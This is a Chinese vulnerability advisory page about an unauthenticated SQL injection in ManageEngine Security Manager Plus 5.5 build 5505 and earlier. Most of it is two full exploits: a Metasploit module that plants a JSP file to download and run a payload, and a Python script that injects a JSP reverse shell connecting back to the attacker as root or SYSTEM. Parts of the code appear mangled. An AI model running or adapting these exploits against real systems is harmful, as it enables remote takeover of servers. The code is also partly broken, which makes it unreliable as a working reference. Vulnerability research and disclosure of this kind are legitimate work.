首页 / 操作系统 / Linux / ManageEngine Security Manager Plus高级搜索SQL注入漏洞
发布日期:2012-10-19 更新日期:2012-10-23受影响系统: ManageEngine Security Manager < 5.5 build 5505 ManageEngine Security Manager 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 56138ManageEngine Security Manager是一款网路安全扫瞄器、漏洞扫描器、补丁管理软件。Security Manager Plus v5.5 build 5505及之前版本存在安全漏洞,远程攻击者可利用此漏洞控制应用、访问或修改数据、利用其他潜在漏洞。<*来源:xistence *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##
require "msf/core"
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::TcpServer include Msf::Exploit::EXE
def initialize(info={}) super(update_info(info, "Name" => "ManageEngine Security Manager Plus <=5.5 build 5505 remote code execution", "Description" => %q{ This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious executable under the context of SYSTEM. No authentication is necessary to exploit this. }, "License" => MSF_LICENSE, "Author" => [ "xistence" # Discovery & Metasploit module ], "References" => [ ], "Payload" => { "BadChars" => "x00", }, "DefaultOptions" => { "ExitFunction" => "none" }, "Platform" => "win", "Targets" => [ # Win XP / 2003 / Vista / Win 7 / etc ["Windows Universal", {}] ], "Privileged" => false, "DisclosureDate" => "Oct 18 2012", "DefaultTarget" => 0))
register_options( [ OptPort.new("RPORT", [true, "The target port", 6262]), ], self.class) end
# # A very gentle check to see if Security Manager Plus exists or not # def check res = send_request_raw({ "method" => "GET", "uri" => "/SecurityManager.cc" })
if res and res.body =~ /<title>Security Manager Plus</title>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end
# # Remove the JSP once we get a shell. # We cannot delete the executable because it will still be in use. # def on_new_session(cli) if cli.type != "meterpreter" print_error("Meterpreter not used. Please manually remove #{@jsp_name + ".jsp"}") return end
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin # jsp = @outpath.gsub(///, "\\") # jsp = jsp.gsub(/"/, "") vprint_status("#{rhost}:#{rport} - Deleting: #{@jsp_name + ".jsp"}") cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + ".jsp"}") print_status("#{rhost}:#{rport} - #{@jsp_name + ".jsp"} deleted") rescue ::Exception => e print_error("Unable to delete #{@jsp_name + ".jsp"}: #{e.message}") end end
# # Transfer the malicious executable to our victim # def on_client_connect(cli) print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") cli.put(@native_payload) service.close_client(cli) end
# tmp folder = C:Program FilesSolarWindsStorage Manager Server emp # This will download our malicious executable in base64 format, decode it back, # save it as a temp file, and then finally execute it. jsp = %Q| <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%>
<% StringBuffer buf = new StringBuffer(); byte[] shellcode = null; BufferedOutputStream outstream = null; try { Socket s = new Socket("#{my_host}", #{my_port}); BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); while (buf.length() < #{@native_payload.length}) { buf.append( (char) r.read()); }
BASE64Decoder decoder = new BASE64Decoder(); shellcode = decoder.decodeBuffer(buf.toString());
outstream = new BufferedOutputStream(new FileOutputStream(path)); outstream.write(shellcode); outstream.close();
Process p = Runtime.getRuntime().exec(path); } catch (Exception e) {} %> |
jsp = jsp.gsub(/
/, "") jsp = jsp.gsub(/ /, "")
jsp.unpack("H*")[0] end
# # Run the actual exploit # def inject_exec # This little lag is meant to ensure the TCP server runs first before the requests select(nil, nil, nil, 1)
# # The server must start first, and then we send the malicious requests # def exploit # Avoid passing this as an argument for performance reasons # This is in base64 is make sure our file isn"t mangled @native_payload = [generate_payload_exe].pack("m*") @native_payload_name = rand_text_alpha(rand(6)+3) @jsp_name = rand_text_alpha(rand(6)+3) @outpath = ""../../webapps/SecurityManager/#{@jsp_name + ".jsp"}"" begin t = framework.threads.spawn("reqs", false) { inject_exec } print_status("Serving executable on #{datastore["SRVHOST"]}:#{datastore["SRVPORT"]}") super ensure t.kill end end end #!/usr/bin/python #+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi (Win+Linux) # Date : 18-10-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win) # Software link : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux) # Vendor site : http://www.manageengine.com/ # Version : 5.5 build 5505 and lower # Tested on : CentOS 5.x + Windows XP/2008 # # Vulnerability : The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, # the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, # which makes a remote shell with root/SYSTEM privileges possible.... # # Fix: # 1. Go to SMP server system and stop SMP service. # 2. Download the SMP_Vul_fix.zip file from : http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip # 3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar # 3. Copy the extracted .jar files to <SMP-HOME>lib directory (e.g., C:AdventNetSecurityManagerlib). [Overwrite the existing jar files and do not rename them] # 4. Start the SMP service. #+--------------------------------------------------------------------------------------------------------------------------------+import urllib, urllib2, cookielib import sys import randomif (len(sys.argv) != 5): print "" print "[*] Security Manager Plus 5.5 build 5505 and lower Remote SYSTEM/root SQLi exploit (Windows+Linux) - xistence (xistence<[at]>0x90.nl) - 2012-05-29" print "" print "[*] Usage: secman-sql.py <RHOST> <LHOST> <LPORT> <OS>" print "[*] I.e.: ./secman-sql.py www.linux.org 192.168.2.66 8888 linux" print "[*] I.e.: ./secman-sql.py www.microsoft.com 192.168.2.66 8888 win" print "[*]" print "[*] RHOST = Remote Host which runs Security Manager Plus" print "[*] LHOST = IP address of local machine (machine where you run the exploit from" print "[*] LPORT = Port on the local machine where you will run NC on for our reverse shell" print "[*] OS = linux/win" print "" print "" exit(0)rhost = sys.argv[1] lhost = sys.argv[2] lport = sys.argv[3] osys = sys.argv[4]if osys == "linux": command = "/bin/bash" elif osys == "win": command = "cmd.exe" else: print "Choose a valid OS, linux/win" exit() filename = "" for i in random.sample("abcdefghijklmnopqrstuvwxyz1234567890",6): filename+=i filename +=".jsp"output_path = "../../webapps/SecurityManager/%s" %filenamejsp = """ <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( """" + lhost +"""", """+lport+""" ); Process process = Runtime.getRuntime().exec( """"+command+"""" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>""" jsp = jsp.replace("
","") jsp = jsp.replace(" ","")payload = "1)) " payload += "UNION SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"" % (jsp.encode("hex"),output_path) payload += " FROM mysql.user WHERE 1=((1"opener = urllib2.build_opener() opener.addheaders.append(("Cookie", "STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;")) post_params = urllib.urlencode({"ANDOR" : "and", "condition_1" : "OpenPorts@PORT","operator_1" : "IN", "value_1" : payload, "COUNT" : "1"})print "[*] Sending evil payload" resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params) print "[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename) resp = opener.open("http://%s:6262/%s" % (rhost,filename)) print "[*] Check your shell on %s %s
" % (lhost,lport)建议: -------------------------------------------------------------------------------- 厂商补丁:ManageEngine ------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.manageengine.com/products/opmanager/index.htmlCA ARCserve Backup RPC Services RPC请求服务崩溃和任意代码执行漏洞Joomla Freestyle Support组件"prodid"参数SQL注入漏洞相关资讯 SQL注入漏洞 ManageEngine Security Manager Plus
已经 14 岁的 SQL 注入仍然是最危 (08/29/2013 13:12:18)
TYPO3 WEC 讨论区SQL注入漏洞 (02/22/2013 08:55:37)
MyBB HM_My Country Flags 插件" (12/28/2012 12:15:26)
TYPO3 My quiz and poll Extension (02/22/2013 08:56:41)
易网时代-编程资源站